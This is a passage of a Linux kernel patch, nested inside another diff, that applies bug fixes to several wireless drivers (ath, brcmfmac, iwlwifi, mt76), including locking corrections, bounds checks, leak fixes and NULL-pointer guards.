+ 	peer = ath11k_peer_find_by_addr(ar->ab, param->peer_addr);
+ 	if (peer) {
+ 		if (peer->vdev_id == param->vdev_id) {
+ 			spin_unlock_bh(&ar->ab->base_lock);
++			mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 			return -EINVAL;
+ 		}
+ 
+ 		/* Assume sta is transitioning to another band.
+ 		 * Remove here the peer from rhash.
+ 		 */
+-		mutex_lock(&ar->ab->tbl_mtx_lock);
+ 		ath11k_peer_rhash_delete(ar->ab, peer);
+-		mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 	}
+ 	spin_unlock_bh(&ar->ab->base_lock);
++	mutex_unlock(&ar->ab->tbl_mtx_lock);
+ 
+ 	ret = ath11k_wmi_send_peer_create_cmd(ar, param);
+ 	if (ret) {
+diff --git a/drivers/net/wireless/ath/ath5k/ahb.c b/drivers/net/wireless/ath/ath5k/ahb.c
+index 2c9cec8b53d9e..28a1e5eff204e 100644
+--- a/drivers/net/wireless/ath/ath5k/ahb.c
++++ b/drivers/net/wireless/ath/ath5k/ahb.c
+@@ -113,15 +113,13 @@ static int ath_ahb_probe(struct platform_device *pdev)
+ 		goto err_out;
+ 	}
+ 
+-	res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
+-	if (res == NULL) {
+-		dev_err(&pdev->dev, "no IRQ resource found\n");
+-		ret = -ENXIO;
++	irq = platform_get_irq(pdev, 0);
++	if (irq < 0) {
++		dev_err(&pdev->dev, "no IRQ resource found: %d\n", irq);
++		ret = irq;
+ 		goto err_iounmap;
+ 	}
+ 
+-	irq = res->start;
+-
+ 	hw = ieee80211_alloc_hw(sizeof(struct ath5k_hw), &ath5k_hw_ops);
+ 	if (hw == NULL) {
+ 		dev_err(&pdev->dev, "no memory for ieee80211_hw\n");
+diff --git a/drivers/net/wireless/ath/ath5k/eeprom.c b/drivers/net/wireless/ath/ath5k/eeprom.c
+index d444b3d70ba2e..58d3e86f6256d 100644
+--- a/drivers/net/wireless/ath/ath5k/eeprom.c
++++ b/drivers/net/wireless/ath/ath5k/eeprom.c
+@@ -529,7 +529,7 @@ ath5k_eeprom_read_freq_list(struct ath5k_hw *ah, int *offset, int max,
+ 		ee->ee_n_piers[mode]++;
+ 
+ 		freq2 = (val >> 8) & 0xff;
+-		if (!freq2)
++		if (!freq2 || i >= max)
+ 			break;
+ 
+ 		pc[i++].freq = ath5k_eeprom_bin2freq(ee,
+diff --git a/drivers/net/wireless/ath/ath6kl/bmi.c b/drivers/net/wireless/ath/ath6kl/bmi.c
+index bde5a10d470c8..af98e871199d3 100644
+--- a/drivers/net/wireless/ath/ath6kl/bmi.c
++++ b/drivers/net/wireless/ath/ath6kl/bmi.c
+@@ -246,7 +246,7 @@ int ath6kl_bmi_execute(struct ath6kl *ar, u32 addr, u32 *param)
+ 		return -EACCES;
+ 	}
+ 
+-	size = sizeof(cid) + sizeof(addr) + sizeof(param);
++	size = sizeof(cid) + sizeof(addr) + sizeof(*param);
+ 	if (size > ar->bmi.max_cmd_size) {
+ 		WARN_ON(1);
+ 		return -EINVAL;
+diff --git a/drivers/net/wireless/ath/ath6kl/htc_pipe.c b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+index c68848819a52d..9b88d96bfe96c 100644
+--- a/drivers/net/wireless/ath/ath6kl/htc_pipe.c
++++ b/drivers/net/wireless/ath/ath6kl/htc_pipe.c
+@@ -960,8 +960,8 @@ static int ath6kl_htc_pipe_rx_complete(struct ath6kl *ar, struct sk_buff *skb,
+ 	 * Thus the possibility of ar->htc_target being NULL
+ 	 * via ath6kl_recv_complete -> ath6kl_usb_io_comp_work.
+ 	 */
+-	if (WARN_ON_ONCE(!target)) {
+-		ath6kl_err("Target not yet initialized\n");
++	if (!target) {
++		ath6kl_dbg(ATH6KL_DBG_HTC, "Target not yet initialized\n");
+ 		status = -EINVAL;
+ 		goto free_skb;
+ 	}
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index f521dfa2f1945..e0130beb304df 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -534,6 +534,24 @@ static struct ath9k_htc_hif hif_usb = {
+ 	.send = hif_usb_send,
+ };
+ 
++/* Need to free remain_skb allocated in ath9k_hif_usb_rx_stream
++ * in case ath9k_hif_usb_rx_stream wasn't called next time to
++ * process the buffer and subsequently free it.
++ */
++static void ath9k_hif_usb_free_rx_remain_skb(struct hif_device_usb *hif_dev)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&hif_dev->rx_lock, flags);
++	if (hif_dev->remain_skb) {
++		dev_kfree_skb_any(hif_dev->remain_skb);
++		hif_dev->remain_skb = NULL;
++		hif_dev->rx_remain_len = 0;
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	spin_unlock_irqrestore(&hif_dev->rx_lock, flags);
++}
++
+ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				    struct sk_buff *skb)
+ {
+@@ -868,6 +886,7 @@ err:
+ static void ath9k_hif_usb_dealloc_rx_urbs(struct hif_device_usb *hif_dev)
+ {
+ 	usb_kill_anchored_urbs(&hif_dev->rx_submitted);
++	ath9k_hif_usb_free_rx_remain_skb(hif_dev);
+ }
+ 
+ static int ath9k_hif_usb_alloc_rx_urbs(struct hif_device_usb *hif_dev)
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index b8c99bfce963a..d17bb22422f48 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -6494,18 +6494,20 @@ static s32 brcmf_notify_rssi(struct brcmf_if *ifp,
+ {
+ 	struct brcmf_cfg80211_vif *vif = ifp->vif;
+ 	struct brcmf_rssi_be *info = data;
+-	s32 rssi, snr, noise;
++	s32 rssi, snr = 0, noise = 0;
+ 	s32 low, high, last;
+ 
+-	if (e->datalen < sizeof(*info)) {
++	if (e->datalen >= sizeof(*info)) {
++		rssi = be32_to_cpu(info->rssi);
++		snr = be32_to_cpu(info->snr);
++		noise = be32_to_cpu(info->noise);
++	} else if (e->datalen >= sizeof(rssi)) {
++		rssi = be32_to_cpu(*(__be32 *)data);
++	} else {
+ 		brcmf_err("insufficient RSSI event data\n");
+ 		return 0;
+ 	}
+ 
+-	rssi = be32_to_cpu(info->rssi);
+-	snr = be32_to_cpu(info->snr);
+-	noise = be32_to_cpu(info->noise);
+-
+ 	low = vif->cqm_rssi_low;
+ 	high = vif->cqm_rssi_high;
+ 	last = vif->cqm_rssi_last;
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index abf49022edbe4..027360e63b926 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -1038,7 +1038,7 @@ iwl_dump_ini_prph_mac_iter(struct iwl_fw_runtime *fwrt,
+ 	range->range_data_size = reg->dev_addr.size;
+ 	for (i = 0; i < le32_to_cpu(reg->dev_addr.size); i += 4) {
+ 		prph_val = iwl_read_prph(fwrt->trans, addr + i);
+-		if (prph_val == 0x5a5a5a5a)
++		if ((prph_val & ~0xf) == 0xa5a5a5a0)
+ 			return -EBUSY;
+ 		*val++ = cpu_to_le32(prph_val);
+ 	}
+@@ -1388,13 +1388,13 @@ static void iwl_ini_get_rxf_data(struct iwl_fw_runtime *fwrt,
+ 	if (!data)
+ 		return;
+ 
++	memset(data, 0, sizeof(*data));
++
+ 	/* make sure only one bit is set in only one fid */
+ 	if (WARN_ONCE(hweight_long(fid1) + hweight_long(fid2) != 1,
+ 		      "fid1=%x, fid2=%x\n", fid1, fid2))
+ 		return;
+ 
+-	memset(data, 0, sizeof(*data));
+-
+ 	if (fid1) {
+ 		fifo_idx = ffs(fid1) - 1;
+ 		if (WARN_ONCE(fifo_idx >= MAX_NUM_LMAC, "fifo_idx=%d\n",
+@@ -1562,7 +1562,7 @@ iwl_dump_ini_dbgi_sram_iter(struct iwl_fw_runtime *fwrt,
+ 		prph_data = iwl_read_prph_no_grab(fwrt->trans, (i % 2) ?
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_MSB :
+ 					  DBGI_SRAM_TARGET_ACCESS_RDATA_LSB);
+-		if (prph_data == 0x5a5a5a5a) {
++		if ((prph_data & ~0xf) == 0xa5a5a5a0) {
+ 			iwl_trans_release_nic_access(fwrt->trans);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 43e997283db0f..607e07ed2477c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -317,8 +317,10 @@ static void *iwl_dbgfs_fw_info_seq_next(struct seq_file *seq,
+ 	const struct iwl_fw *fw = priv->fwrt->fw;
+ 
+ 	*pos = ++state->pos;
+-	if (*pos >= fw->ucode_capa.n_cmd_versions)
++	if (*pos >= fw->ucode_capa.n_cmd_versions) {
++		kfree(state);
+ 		return NULL;
++	}
+ 
+ 	return state;
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index 48e7376a5fea7..7ed4991f8dab9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -138,6 +138,12 @@ static int iwl_dbg_tlv_alloc_buf_alloc(struct iwl_trans *trans,
+ 	    alloc_id != IWL_FW_INI_ALLOCATION_ID_DBGC1)
+ 		goto err;
+ 
++	if (buf_location == IWL_FW_INI_LOCATION_DRAM_PATH &&
++	    alloc->req_size == 0) {
++		IWL_ERR(trans, "WRT: Invalid DRAM buffer allocation requested size (0)\n");
++		return -EINVAL;
++	}
++
+ 	trans->dbg.fw_mon_cfg[alloc_id] = *alloc;
+ 
+ 	return 0;
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+index ae4c2a3d63d5b..3a3c13a41fc61 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-debug.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
+ /*
+- * Copyright (C) 2005-2011, 2021 Intel Corporation
++ * Copyright (C) 2005-2011, 2021-2022 Intel Corporation
+  */
+ #include <linux/device.h>
+ #include <linux/interrupt.h>
+@@ -57,6 +57,7 @@ void __iwl_err(struct device *dev, enum iwl_err_mode mode, const char *fmt, ...)
+ 	default:
+ 		break;
+ 	}
++	vaf.va = &args;
+ 	trace_iwlwifi_err(&vaf);
+ 	va_end(args);
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index c5ad34b063df6..29f75948ab00c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -563,6 +563,7 @@ static void iwl_mvm_wowlan_get_tkip_data(struct ieee80211_hw *hw,
+ 		}
+ 
+ 		for (i = 0; i < IWL_NUM_RSC; i++) {
++			ieee80211_get_key_rx_seq(key, i, &seq);
+ 			/* wrapping isn't allowed, AP must rekey */
+ 			if (seq.tkip.iv32 > cur_rx_iv32)
+ 				cur_rx_iv32 = seq.tkip.iv32;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+index 1ce9450e5add2..4071827d44757 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c
+@@ -1745,6 +1745,11 @@ static ssize_t iwl_dbgfs_mem_read(struct file *file, char __user *user_buf,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (le32_to_cpu(rsp->status) != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+@@ -1821,6 +1826,11 @@ static ssize_t iwl_dbgfs_mem_write(struct file *file,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (rsp->status != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 1d46a2b345eb3..a29e685aac4ff 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -5518,7 +5518,10 @@ static bool iwl_mvm_mac_can_aggregate(struct ieee80211_hw *hw,
+ {
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 
+-	if (mvm->trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ)
++	if (mvm->trans->trans_cfg->device_family > IWL_DEVICE_FAMILY_BZ ||
++	    (mvm->trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_BZ &&
++	     !(CSR_HW_REV_TYPE(mvm->trans->hw_rev) == IWL_CFG_MAC_TYPE_GL &&
++	       mvm->trans->hw_rev_step == SILICON_A_STEP)))
+ 		return iwl_mvm_tx_csum_bz(mvm, head, true) ==
+ 		       iwl_mvm_tx_csum_bz(mvm, skb, true);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+index 49ca1e168fc5b..eee98cebbb46a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+@@ -384,9 +384,10 @@ void iwl_mvm_rx_rx_mpdu(struct iwl_mvm *mvm, struct napi_struct *napi,
+ 		 * Don't even try to decrypt a MCAST frame that was received
+ 		 * before the managed vif is authorized, we'd fail anyway.
+ 		 */
+-		if (vif->type == NL80211_IFTYPE_STATION &&
++		if (is_multicast_ether_addr(hdr->addr1) &&
++		    vif->type == NL80211_IFTYPE_STATION &&
+ 		    !mvmvif->authorized &&
+-		    is_multicast_ether_addr(hdr->addr1)) {
++		    ieee80211_has_protected(hdr->frame_control)) {
+ 			IWL_DEBUG_DROP(mvm, "MCAST before the vif is authorized\n");
+ 			kfree_skb(skb);
+ 			rcu_read_unlock();
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 97b67270f3847..a5356c0d91953 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -193,8 +193,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	 * Starting from Bz hardware, it calculates starting directly after
+ 	 * the MAC header, so that matches mac80211's expectation.
+ 	 */
+-	if (skb->ip_summed == CHECKSUM_COMPLETE &&
+-	    mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ) {
++	if (skb->ip_summed == CHECKSUM_COMPLETE) {
+ 		struct {
+ 			u8 hdr[6];
+ 			__be16 type;
+@@ -209,7 +208,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 			      shdr->type != htons(ETH_P_PAE) &&
+ 			      shdr->type != htons(ETH_P_TDLS))))
+ 			skb->ip_summed = CHECKSUM_NONE;
+-		else
++		else if (mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ)
+ 			/* mac80211 assumes full CSUM including SNAP header */
+ 			skb_postpush_rcsum(skb, shdr, sizeof(*shdr));
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 99768d6a60322..a0bf19b18635c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -565,7 +565,6 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x43F0, 0x1652, killer1650i_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650i_name),
+ 	IWL_DEV_INFO(0x43F0, 0x2074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0x43F0, 0x4070, iwl_ax201_cfg_qu_hr, NULL),
+-	IWL_DEV_INFO(0x43F0, 0x1651, killer1650s_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650s_name),
+ 	IWL_DEV_INFO(0xA0F0, 0x0070, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0078, iwl_ax201_cfg_qu_hr, NULL),
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 0a9af1ad1f206..171b6bf4a65a0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -599,7 +599,6 @@ static int iwl_pcie_set_hw_ready(struct iwl_trans *trans)
+ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ {
+ 	int ret;
+-	int t = 0;
+ 	int iter;
+ 
+ 	IWL_DEBUG_INFO(trans, "iwl_trans_prepare_card_hw enter\n");
+@@ -616,6 +615,8 @@ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ 	usleep_range(1000, 2000);
+ 
+ 	for (iter = 0; iter < 10; iter++) {
++		int t = 0;
++
+ 		/* If HW is not ready, prepare the conditions to check again */
+ 		iwl_set_bit(trans, CSR_HW_IF_CONFIG_REG,
+ 			    CSR_HW_IF_CONFIG_REG_PREPARE);
+@@ -1522,19 +1523,16 @@ static int iwl_pcie_d3_handshake(struct iwl_trans *trans, bool suspend)
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 	int ret;
+ 
+-	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210) {
++	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210)
+ 		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+ 				    suspend ? UREG_DOORBELL_TO_ISR6_SUSPEND :
+ 					      UREG_DOORBELL_TO_ISR6_RESUME);
+-	} else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ) {
++	else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ)
+ 		iwl_write32(trans, CSR_IPC_SLEEP_CONTROL,
+ 			    suspend ? CSR_IPC_SLEEP_CONTROL_SUSPEND :
+ 				      CSR_IPC_SLEEP_CONTROL_RESUME);
+-		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+-				    UREG_DOORBELL_TO_ISR6_SLEEP_CTRL);
+-	} else {
++	else
+ 		return 0;
+-	}
+ 
+ 	ret = wait_event_timeout(trans_pcie->sx_waitq,
+ 				 trans_pcie->sx_complete, 2 * HZ);
+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index d147dc698c9db..4b6cb3aee8487 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -577,7 +577,9 @@ free:
+ free_skb:
+ 	status.skb = tx_info.skb;
+ 	hw = mt76_tx_status_get_hw(dev, tx_info.skb);
++	spin_lock_bh(&dev->rx_lock);
+ 	ieee80211_tx_status_ext(hw, &status);
++	spin_unlock_bh(&dev->rx_lock);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index d8216243b0224..1fc2fe61ef773 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -908,10 +908,11 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ 
+ #define mt76_poll(dev, ...) __mt76_poll(&((dev)->mt76), __VA_ARGS__)
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout);
+-
+-#define mt76_poll_msec(dev, ...) __mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int kick);
++#define __mt76_poll_msec(...)         ____mt76_poll_msec(__VA_ARGS__, 10)
++#define mt76_poll_msec(dev, ...)      ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__, 10)
++#define mt76_poll_msec_tick(dev, ...) ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
+ 
+ void mt76_mmio_init(struct mt76_dev *dev, void __iomem *regs);
+ void mt76_pci_disable_aspm(struct pci_dev *pdev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 70a7f84af0282..12e0af52082a6 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1279,8 +1279,11 @@ void mt7603_mac_add_txs(struct mt7603_dev *dev, void *data)
+ 	if (wcidx >= MT7603_WTBL_STA || !sta)
+ 		goto out;
+ 
+-	if (mt7603_fill_txs(dev, msta, &info, txs_data))
++	if (mt7603_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mt76_hw(dev), sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index 51a968a6afdc9..eafa0f204c1f8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1530,8 +1530,11 @@ static void mt7615_mac_add_txs(struct mt7615_dev *dev, void *data)
+ 	if (wcid->phy_idx && dev->mt76.phys[MT_BAND1])
+ 		mphy = dev->mt76.phys[MT_BAND1];
+ 
+-	if (mt7615_fill_txs(dev, msta, &info, txs_data))
++	if (mt7615_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mphy->hw, sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+@@ -2352,7 +2355,7 @@ void mt7615_coredump_work(struct work_struct *work)
+ 			break;
+ 
+ 		skb_pull(skb, sizeof(struct mt7615_mcu_rxd));
+-		if (data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
++		if (!dump || data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
+ 			dev_kfree_skb(skb);
+ 			continue;
+ 		}
+@@ -2362,6 +2365,8 @@ void mt7615_coredump_work(struct work_struct *work)
+ 
+ 		dev_kfree_skb(skb);
+ 	}
+-	dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
+-		      GFP_KERNEL);
++
++	if (dump)
++		dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
++			      GFP_KERNEL);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index aed4ee95fb2ec..82aac0a04655f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -537,7 +537,8 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 	if (txwi[2] & cpu_to_le32(MT_TXD2_FIX_RATE)) {
+ 		/* Fixed rata is available just for 802.11 txd */
+ 		struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+-		bool multicast = is_multicast_ether_addr(hdr->addr1);
++		bool multicast = ieee80211_is_data(hdr->frame_control) &&
++				 is_multicast_ether_addr(hdr->addr1);
+ 		u16 rate = mt76_connac2_mac_tx_rate_val(mphy, vif, beacon,
+ 							multicast);
+ 		u32 val = MT_TXD6_FIXED_BW;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index d106cbfc387c8..b678820ba6327 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -1632,8 +1632,16 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 	req->channel_min_dwell_time = cpu_to_le16(duration);
+ 	req->channel_dwell_time = cpu_to_le16(duration);
+ 
+-	req->channels_num = min_t(u8, sreq->n_channels, 32);
+-	req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	if (sreq->n_channels == 0 || sreq->n_channels > 64) {
++		req->channel_type = 0;
++		req->channels_num = 0;
++		req->ext_channels_num = 0;
++	} else {
++		req->channel_type = 4;
++		req->channels_num = min_t(u8, sreq->n_channels, 32);
++		req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	}
++
+ 	for (i = 0; i < req->channels_num + req->ext_channels_num; i++) {
+ 		if (i >= 32)
+ 			chan = &req->ext_channels[i - 32];
+@@ -1653,7 +1661,6 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 		}
+ 		chan->channel_num = scan_list[i]->hw_value;
+ 	}
+-	req->channel_type = sreq->n_channels ? 4 : 0;
+ 
+ 	if (sreq->ie_len > 0) {
+ 		memcpy(req->ies, sreq->ie, sreq->ie_len);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+index 82fdf6d794bcf..3c7c369d997ad 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+@@ -962,9 +962,6 @@ enum {
+ 	DEV_INFO_MAX_NUM
+ };
+ 
+-#define MCU_UNI_CMD_EVENT                       BIT(1)
+-#define MCU_UNI_CMD_UNSOLICITED_EVENT           BIT(2)
+-
+ /* event table */
+ enum {
+ 	MCU_EVENT_TARGET_ADDRESS_LEN = 0x01,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+index d3f74473e6fb0..3e41d809ade39 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+@@ -631,8 +631,11 @@ void mt76x02_send_tx_status(struct mt76x02_dev *dev,
+ 
+ 	mt76_tx_status_unlock(mdev, &list);
+ 
+-	if (!status.skb)
++	if (!status.skb) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_ext(mt76_hw(dev), &status);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ 	if (!len)
+ 		goto out;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/init.c b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+index a80ae31e7abff..0d8bc7b06a46b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+@@ -90,6 +90,7 @@ static ssize_t mt7915_thermal_temp_store(struct device *dev,
+ 	     val < phy->throttle_temp[MT7915_CRIT_TEMP_IDX])) {
+ 		dev_err(phy->dev->mt76.dev,
+ 			"temp1_max shall be greater than temp1_crit.");
++		mutex_unlock(&phy->dev->mt76.mutex);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -145,8 +146,11 @@ mt7915_thermal_set_cur_throttle_state(struct thermal_cooling_device *cdev,
+ 	u8 throttling = MT7915_THERMAL_THROTTLE_MAX - state;
+ 	int ret;
+ 
+-	if (state > MT7915_CDEV_THROTTLE_MAX)
++	if (state > MT7915_CDEV_THROTTLE_MAX) {
++		dev_err(phy->dev->mt76.dev,
++			"please specify a valid throttling state\n");
+ 		return -EINVAL;
++	}
+ 
+ 	if (state == phy->cdev_state)
+ 		return 0;
